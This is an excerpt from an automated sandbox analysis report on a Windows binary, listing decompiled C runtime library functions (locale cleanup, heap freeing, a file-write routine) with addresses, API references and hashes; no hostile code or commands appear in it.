				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x00418fc0
0x00418fc8
0x00418fcf
0x00418fd4
0x00418fd7
0x00418fda
0x00418fdd
0x00418fdf
0x00418fe2
0x00418fe8
0x00418feb
0x00418fee
0x00418ff1
0x00418ff6
0x004193d9
0x004193db
0x004193dd
0x004193dd
0x004193e0
0x004193e6
0x004193e6
0x004193e8
0x004193ee
0x004193f4
0x004193fe
0x00419408
0x0041940f
0x0041941d
0x0041941d
0x00418ffc
0x00418fff
0x00419004
0x00419022
0x0041902c
0x0041902f
0x00419042
0x00419045
0x00419052
0x00419055
0x00419058
0x0041906a
0x0041906d
0x0041907f
0x00419082
0x00419087
0x0041908d
0x004193a2
0x004193a5
0x004193ad
0x004193b3
0x004193bb
0x004193c5
0x004193c5
0x00000000
0x0041909c
0x0041909c
0x004190a1
0x00000000
0x004190b8
0x004190b8
0x004190ba
0x004190ba
0x004190bd
0x004190be
0x004190d4
0x00000000
0x00000000
0x004190da
0x004190e0
0x00000000
0x00000000
0x004190e6
0x004190e9
0x004190ef
0x00419145
0x00419148
0x00419152
0x00419167
0x0041916b
0x00419170
0x00419173
0x00419175
0x00000000
0x00000000
0x0041919e
0x004191a3
0x004191a6
0x004191a8
0x00000000
0x00000000
0x004191c3
0x004191c9
0x004191ce
0x004191d3
0x00000000
0x00000000
0x004191d9
0x004191e2
0x004191e8
0x004191eb
0x004191ee
0x004191f1
0x004191f4
0x004191fa
0x004191fd
0x00419200
0x00419203
0x00419205
0x0041920b
0x0041920e
0x00419210
0x004192e0
0x004192e7
0x004192e8
0x004192f3
0x004192f8
0x00419302
0x00419304
0x00419305
0x00419307
0x00419308
0x00419310
0x00419310
0x00419312
0x00419314
0x00419315
0x00419320
0x00419325
0x00419329
0x00419337
0x00419342
0x0041934a
0x00419358
0x00419363
0x00419368
0x00419329
0x0041936b
0x0041936e
0x00419374
0x0041937d
0x00419382
0x0041938b
0x00419394
0x0041939d
0x004193c6
0x004193c9
0x004193cf
0x00000000
0x004193cf
0x0041921d
0x00419276
0x00419279
0x0041927c
0x00000000
0x00000000
0x0041927e
0x00419281
0x00419281
0x00419284
0x00419286
0x00000000
0x00000000
0x00419288
0x0041928e
0x00419291
0x00419293
0x004192d6
0x004192d6
0x004192d9
0x004192dc
0x00000000
0x00000000
0x00000000
0x004192dc
0x0041929b
0x004192a4
0x004192a6
0x004192a6
0x004192a8
0x004192ab
0x004192ae
0x004192b1
0x004192b3
0x004192b8
0x004192bb
0x004192be
0x004192c1
0x004192c3
0x004192c8
0x004192c9
0x004192c9
0x004192cd
0x004192d0
0x004192d3
0x00000000
0x004192d3
0x004192de
0x004192de
0x00000000
0x004192de
0x00419226
0x00419229
0x00419236
0x00419238
0x0041923d
0x00419240
0x00419243
0x0041924b
0x0041924d
0x0041925b
0x0041925e
0x00419261
0x00419264
0x00419266
0x00419269
0x0041926d
0x00000000
0x00419274
0x004190f1
0x004190f8
0x00419112
0x00419115
0x00419118
0x00000000
0x00000000
0x0041911a
0x0041911d
0x0041911d
0x00419120
0x00419122
0x00000000
0x00000000
0x00419124
0x0041912a
0x0041912c
0x0041913b
0x0041913b
0x0041913e
0x00419140
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041912e
0x0041912e
0x0041912e
0x00419132
0x00419137
0x00419137
0x00000000
0x0041912e
0x00419142
0x00000000
0x00419142
0x00419108
0x0041910d
0x00000000
0x0041910d
0x004190a1
0x0041908d
0x00419006
0x00419007
0x0041900c
0x00419010
0x00419011
0x00419012
0x00419017
0x0041901c
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0041902F
_free.LIBCMT ref: 00419045
_free.LIBCMT ref: 00419058
_free.LIBCMT ref: 0041906D
_free.LIBCMT ref: 00419082
GetCPInfo.KERNEL32(?,?), ref: 004190CC

Part of subcall function 00421645: _free.LIBCMT ref: 004216B0

_free.LIBCMT ref: 00419337
_free.LIBCMT ref: 0041934A
_free.LIBCMT ref: 00419358
_free.LIBCMT ref: 00419363
_free.LIBCMT ref: 004193A5
_free.LIBCMT ref: 004193AD
_free.LIBCMT ref: 004193B3
_free.LIBCMT ref: 004193BB
_free.LIBCMT ref: 004193C9

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 57b3d58847d8b8d7e1314d26d7156c111b6fdeb49c4a152eef2c484001ac0770
Instruction ID: a89f40da994da54df2195b3b99ffb1718498b2c92a670a46730b441c06d2bf38
Opcode Fuzzy Hash: 57b3d58847d8b8d7e1314d26d7156c111b6fdeb49c4a152eef2c484001ac0770
Instruction Fuzzy Hash: CFD1A071900209AFDB11CF66C891BEEB7F5BF08304F14456EE895AB382D779AC85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044334A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443383
___free_lconv_mon.LIBCMT ref: 0044338E

Part of subcall function 00442EB5: _free.LIBCMT ref: 00442ED2
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EE4
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EF6
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F08
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F1A
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F2C
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F3E
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F50
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F62
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F74
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F86
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F98
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442FAA

_free.LIBCMT ref: 004433A5
_free.LIBCMT ref: 004433BA
_free.LIBCMT ref: 004433C5
_free.LIBCMT ref: 004433E7
_free.LIBCMT ref: 004433FA
_free.LIBCMT ref: 00443408
_free.LIBCMT ref: 00443413
_free.LIBCMT ref: 0044344B
_free.LIBCMT ref: 00443452
_free.LIBCMT ref: 0044346F
_free.LIBCMT ref: 00443487

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: e100d89efc77f6660f900502eb6a5fb719d01ec0de4ba7df5e478026bf40f879
Instruction ID: ce84940d4ec221c3e00cea4fbe0e61062730256890f47c7b2aa3b88f8ab69c0d
Opcode Fuzzy Hash: e100d89efc77f6660f900502eb6a5fb719d01ec0de4ba7df5e478026bf40f879
Instruction Fuzzy Hash: 28314E31600601AEFB219E3AD845B9B77E4AF01B15F14881FE455D72A1DF78EE818B1C

Uniqueness

Uniqueness Score: -1.00%

Function 00426306 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00426306(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x43d160) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0041E238(_t46);
							E004255B2( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0041E238(_t47);
							E00425A66( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0041E238( *((intOrPtr*)(_t74 + 0x7c)));
						E0041E238( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0041E238( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0041E238( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0041E238( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0041E238( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00426477( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x43d290) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0041E238(_t31);
							E0041E238( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0041E238(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0041E238(_t74);
			}

0x0042630e
0x00426312
0x0042631a
0x00426323
0x00426328
0x0042632f
0x00426337
0x0042633f
0x0042634a
0x00426350
0x00426351
0x00426359
0x00426361
0x0042636c
0x00426372
0x00426376
0x00426381
0x00426387
0x00426328
0x00426388
0x00426390
0x004263a3
0x004263b6
0x004263c4
0x004263cf
0x004263d4
0x004263dd
0x004263e5
0x004263e6
0x004263ec
0x004263ef
0x004263f2
0x004263f9
0x004263fb
0x004263ff
0x00426407
0x0042640e
0x00426414
0x00426415
0x00426415
0x0042641c
0x0042641e
0x00426423
0x0042642b
0x00426430
0x00426431
0x00426431
0x00426434
0x00426437
0x0042643a
0x0042643d
0x0042643d
0x0042644d

APIs

___free_lconv_mon.LIBCMT ref: 0042634A

Part of subcall function 004255B2: _free.LIBCMT ref: 004255CF
Part of subcall function 004255B2: _free.LIBCMT ref: 004255E1
Part of subcall function 004255B2: _free.LIBCMT ref: 004255F3
Part of subcall function 004255B2: _free.LIBCMT ref: 00425605
Part of subcall function 004255B2: _free.LIBCMT ref: 00425617
Part of subcall function 004255B2: _free.LIBCMT ref: 00425629
Part of subcall function 004255B2: _free.LIBCMT ref: 0042563B
Part of subcall function 004255B2: _free.LIBCMT ref: 0042564D
Part of subcall function 004255B2: _free.LIBCMT ref: 0042565F
Part of subcall function 004255B2: _free.LIBCMT ref: 00425671
Part of subcall function 004255B2: _free.LIBCMT ref: 00425683
Part of subcall function 004255B2: _free.LIBCMT ref: 00425695
Part of subcall function 004255B2: _free.LIBCMT ref: 004256A7

_free.LIBCMT ref: 0042633F

Part of subcall function 0041E238: HeapFree.KERNEL32(00000000,00000000,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?), ref: 0041E24E
Part of subcall function 0041E238: GetLastError.KERNEL32(?,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?,?), ref: 0041E260

_free.LIBCMT ref: 00426361
_free.LIBCMT ref: 00426376
_free.LIBCMT ref: 00426381
_free.LIBCMT ref: 004263A3
_free.LIBCMT ref: 004263B6
_free.LIBCMT ref: 004263C4
_free.LIBCMT ref: 004263CF
_free.LIBCMT ref: 00426407
_free.LIBCMT ref: 0042640E
_free.LIBCMT ref: 0042642B
_free.LIBCMT ref: 00426443

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
Instruction ID: 9c3176418105df558e436c594c79d60ce8d7a963b3dddbc437b4d7116a77e68e
Opcode Fuzzy Hash: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
Instruction Fuzzy Hash: 4831A3316003149FEB24AA3AE945B9BB3E8AF04314F91455FE844DB291DF78EC80CB18

Uniqueness

Uniqueness Score: -1.00%

Function 10009F91 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10009F91(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x100176f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E100079CC(_t46);
							E1000C3B0( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E100079CC(_t47);
							E1000C4AE( *((intOrPtr*)(_t74 + 0x88)));
						}
						E100079CC( *((intOrPtr*)(_t74 + 0x7c)));
						E100079CC( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E100079CC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E100079CC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E100079CC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E100079CC( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E1000A102( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x10017638) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E100079CC(_t31);
							E100079CC( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E100079CC(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E100079CC(_t74);
			}

0x10009f99
0x10009f9d
0x10009fa5
0x10009fae
0x10009fb3
0x10009fba
0x10009fc2
0x10009fca
0x10009fd5
0x10009fdb
0x10009fdc
0x10009fe4
0x10009fec
0x10009ff7
0x10009ffd
0x1000a001
0x1000a00c
0x1000a012
0x10009fb3
0x1000a013
0x1000a01b
0x1000a02e
0x1000a041
0x1000a04f
0x1000a05a
0x1000a05f
0x1000a068
0x1000a070
0x1000a071
0x1000a077
0x1000a07a
0x1000a07d
0x1000a084
0x1000a086
0x1000a08a
0x1000a092
0x1000a099
0x1000a09f
0x1000a0a0
0x1000a0a0
0x1000a0a7
0x1000a0a9
0x1000a0ae
0x1000a0b6
0x1000a0bb
0x1000a0bc
0x1000a0bc
0x1000a0bf
0x1000a0c2
0x1000a0c5
0x1000a0c8
0x1000a0c8
0x1000a0d8

APIs

___free_lconv_mon.LIBCMT ref: 10009FD5

Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C3CD
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C3DF
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C3F1
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C403
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C415
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C427
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C439
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C44B
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C45D
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C46F
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C481
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C493
Part of subcall function 1000C3B0: _free.LIBCMT ref: 1000C4A5

_free.LIBCMT ref: 10009FCA

Part of subcall function 100079CC: RtlFreeHeap.NTDLL(00000000,00000000,?,10006680), ref: 100079E2
Part of subcall function 100079CC: GetLastError.KERNEL32(?,?,10006680), ref: 100079F4

_free.LIBCMT ref: 10009FEC
_free.LIBCMT ref: 1000A001
_free.LIBCMT ref: 1000A00C
_free.LIBCMT ref: 1000A02E
_free.LIBCMT ref: 1000A041
_free.LIBCMT ref: 1000A04F
_free.LIBCMT ref: 1000A05A
_free.LIBCMT ref: 1000A092
_free.LIBCMT ref: 1000A099
_free.LIBCMT ref: 1000A0B6
_free.LIBCMT ref: 1000A0CE

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 43cd7d27fc9a4f62fe1fc3474c76bdfebb94d341186b69348abc09a33720c4e1
Instruction ID: 7b1586147d1a4102f5486d1f7b0fcce68b57fdbea82db74926a39b557839dc0f
Opcode Fuzzy Hash: 43cd7d27fc9a4f62fe1fc3474c76bdfebb94d341186b69348abc09a33720c4e1
Instruction Fuzzy Hash: 24314731A0420A9EFB61DA38D841B9A7BE9FF023D0F514529E049DB16ADB75FC80CB21

Uniqueness

Uniqueness Score: -1.00%

Function 004256B0 Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004256B0(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E0041E1DB(1, 0x50);
					_v8 = _t235;
					E0041E238(0);
					if(_t235 != 0) {
						_t228 = E0041E1DB(1, 4);
						_v12 = _t228;
						E0041E238(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x43d160, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E0041E1DB(1, 4);
							_v16 = _t233;
							E0041E238(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E00421645(_t225);
								_t118 = E00421645(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E00421645(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E00421645(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E00421645(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E00421645(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E00421645(_t225);
								_t142 = E00421645(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E00421645(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E00421645(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E00421645(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E00421645(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E00421645(_t225);
								_t166 = E00421645(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E00421645(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E00421645(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E00421645(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E00421645(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E00421645(_t225);
								_t190 = E00421645(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E00421645(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E004255B2(_v8);
								E0041E238(_v8);
								E0041E238(_v12);
								E0041E238(_v16);
								goto L4;
							}
							E0041E238(_t235);
							E0041E238(_v12);
							L7:
							goto L4;
						}
						E0041E238(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x43d160;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E0041E238( *(_t209 + 0x88));
							E0041E238( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x004256b0
0x004256b9
0x004256c0
0x004256c3
0x004256c6
0x004256cf
0x004256f1
0x004256f5
0x004256f8
0x00425702
0x00425715
0x00425719
0x0042571c
0x00425726
0x00425738
0x004259ca
0x004259cb
0x004259cd
0x004259d5
0x004259d9
0x004259de
0x004259e9
0x004259f5
0x00425a01
0x00425a0d
0x00425a13
0x00425a17
0x00425a19
0x00425a19
0x00000000
0x00425a17
0x00425747
0x0042574b
0x0042574e
0x00425758
0x0042576c
0x00425772
0x0042577f
0x00425796
0x004257ad
0x004257c4
0x004257d4
0x004257e1
0x004257f8
0x0042580f
0x00425826
0x00425840
0x00425857
0x0042586e
0x00425885
0x0042589f
0x004258b6
0x004258cd
0x004258e4
0x004258fe
0x00425915
0x00425922
0x00425923
0x00425925
0x0042592c
0x00425943
0x00425967
0x00425995
0x004259a4
0x004259a4
0x004259a8
0x00000000
0x00000000
0x00425999
0x00425999
0x0042599f
0x004259ae
0x004259a3
0x004259a3
0x00000000
0x004259a3
0x004259b0
0x004259b2
0x004259b2
0x004259b5
0x004259b7
0x004259ba
0x00000000
0x004259be
0x004259a1
0x00000000
0x004259a1
0x00000000
0x004259aa
0x0042596d
0x00425973
0x0042597c
0x00425985
0x00000000
0x0042598a
0x0042575b
0x00425764
0x0042572e
0x00000000
0x0042572e
0x00425729
0x00000000
0x00425729
0x00425704
0x00000000
0x004256d9
0x004256d9
0x004256db
0x004256de
0x00425a1b
0x00425a1b
0x00425a23
0x00425a25
0x00425a25
0x00425a2d
0x00425a32
0x00425a36
0x00425a3e
0x00425a46
0x00425a4c
0x00425a36
0x00425a50
0x00425a55
0x00425a5b
0x00000000
0x00425a5b

APIs

_free.LIBCMT ref: 004256F8
_free.LIBCMT ref: 0042571C
_free.LIBCMT ref: 00425729
_free.LIBCMT ref: 0042574E
_free.LIBCMT ref: 0042575B
_free.LIBCMT ref: 00425764
_free.LIBCMT ref: 00425A3E
_free.LIBCMT ref: 00425A46

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e957172d5befec8fcd855eb4b3ea75b58dd340e647b9fa9baa5d9343b65908cd
Instruction ID: 4ffc3a2919ed6c18ff6da86fd6d5dd667ad82d1c6fc98790d410f2b9c514589c
Opcode Fuzzy Hash: e957172d5befec8fcd855eb4b3ea75b58dd340e647b9fa9baa5d9343b65908cd
Instruction Fuzzy Hash: C7C196B1E40214AFDB20DB99DC82FEF77F8AF08714F54416AFA05FB282D67499418B64

Uniqueness

Uniqueness Score: -1.00%

Function 0041D703 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0041D703(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E0041355E(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00413571( *_t137))) = 9;
						L60:
						_t139 = E00413497();
						goto L61;
					}
					__eflags = _t198 -  *0x450ae0; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x4508e0 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
